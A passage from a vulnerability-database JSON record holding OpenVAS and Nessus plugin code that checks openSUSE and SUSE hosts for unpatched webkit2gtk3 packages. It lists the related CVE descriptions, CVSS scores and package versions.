See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852089\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:43:57 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3473-1\");\n script_xref(name:\"URL\", 
value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:3473-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a 
denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-06-05T11:22:13", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and 
application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. 
This update\n was imported from the SUSE:SLE-15:Update update project.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "id": "OPENSUSE-2018-845.NASL", "href": "https://www.tenable.com/plugins/nessus/111626", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-845.\n#\n# The text 
description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111626);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2018-845)\");\n script_summary(english:\"Check for the openSUSE-2018-845 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and 
application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:13:38", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo"], "id": "SUSE_SU-2018-2075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120064", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2075-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120064);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2018:2075-1)\");\n 
script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory 